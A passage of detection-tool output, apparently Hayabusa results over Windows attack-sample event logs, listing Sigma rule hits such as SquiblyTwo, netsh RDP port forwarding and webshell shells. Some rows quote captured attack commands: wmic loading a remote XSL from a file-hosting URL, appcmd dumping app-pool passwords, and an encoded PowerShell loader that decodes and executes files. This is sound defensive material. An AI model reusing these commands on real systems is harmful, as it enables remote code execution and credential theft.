/format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,SquiblyTwo,,rules/sigma/process_creation/win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:49:08.422 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 01:50:44.582 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,informational,Process Creation,"Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat : Path: \\vboxsrv\HTools\msxsl.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,XSL Script Processing,,rules/sigma/process_creation/win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:26:09.437 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx +2019-05-24 02:45:34.538 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,informational,Process Creation,"Command: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 : Path: C:\Windows\System32\netsh.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,Netsh Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,Netsh RDP Port Forwarding,,rules/sigma/process_creation/win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\system32\cmd.exe"" /c net user : Path: C:\Windows\System32\cmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,informational,Process Creation,"Command: net user : Path: C:\Windows\System32\net.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""c:\windows\system32\cmd.exe"" /c net user",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\net1 user : Path: C:\Windows\System32\net1.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: net user,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx +2019-05-26 13:01:42.385 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:42.966 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" : Path: C:\Users\IEUser\Desktop\info.rar\jjs.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\svchost.exe : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
""C:\Users\IEUser\Desktop\info.rar\jjs.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Suspect Svchost Activity,,rules/sigma/process_creation/win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\System32\notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:56.727 
+09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,Notepad Making 
Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:00.752 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,low,Non Interactive 
PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,high,Shells Spawned by Web Servers,,rules/sigma/process_creation/win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:28:42.711 +09:00,IEWIN7,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.000 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\InetSRV\appcmd.exe"" list vdir /text:physicalpath : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.110 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppools /text:name : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.190 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.270 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.350 +09:00,IEWIN7,1,informational,Process Creation,"Command: 
""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.581 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAG
MAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:17.661 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username : 